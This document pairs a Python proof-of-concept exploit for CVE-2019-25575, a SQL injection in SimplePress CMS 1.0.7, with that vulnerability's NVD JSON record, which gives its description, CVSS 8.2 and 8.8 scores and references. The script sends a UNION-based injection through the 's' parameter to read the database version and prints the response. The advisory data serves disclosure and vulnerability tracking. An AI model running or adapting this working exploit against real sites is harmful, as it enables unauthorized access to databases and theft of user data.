CVE-2019-25575

import requests def exploit_sqli(target_url): """ PoC for CVE-2019-25575 SimplePress CMS SQL Injection Vulnerable parameters: 'p' and 's' """ # Payload to extract database version using UNION based SQL injection # Note: The number of columns might need adjustment based on the specific query payload = { "p": "1", "s": "1' UNION SELECT 1, version(), 3, 4, 5-- -" } try: response = requests.get(target_url, params=payload, timeout=10) if response.status_code == 200: print(f"[+] Request sent to {target_url}") print(f"[+] Payload: {payload}") print("[+] Response snippet:") print(response.text[:500]) # Display part of the response else: print(f"[-] Server returned status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Replace with the actual target URL target = "http://127.0.0.1/simplepress/index.php" exploit_sqli(target)

{"cve": {"id": "CVE-2019-25575", "sourceIdentifier": "[email protected]", "published": "2026-03-21T16:16:01.147", "lastModified": "2026-04-15T17:09:48.490", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SimplePress CMS 1.0.7 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'p' and 's' parameters. Attackers can send GET requests with crafted SQL payloads to extract sensitive database information including usernames, database names, and version details."}, {"lang": "es", "value": "SimplePress CMS 1.0.7 contiene una vulnerabilidad de inyección SQL que permite a atacantes no autenticados ejecutar consultas SQL arbitrarias inyectando código malicioso a través de los parámetros 'p' y 's'. Los atacantes pueden enviar solicitudes GET con cargas útiles SQL manipuladas para extraer información sensible de la base de datos, incluyendo nombres de usuario, nombres de bases de datos y detalles de la versión."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:simplepresscms:simplepress_cms:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.0.7", "matchCriteriaId": "CF1C4B49-CB22-4030-B87B-EB5D48CAAE1A"}]}]}], "references": [{"url": "https://ayera.dl.sourceforge.net/project/simplepresscms/1.0%20alpha/1.0.7_alpha.zip", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://sourceforge.net/projects/simplepresscms/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46235", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/simplepress-cms-sql-injection-via-p-and-s-parameters", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}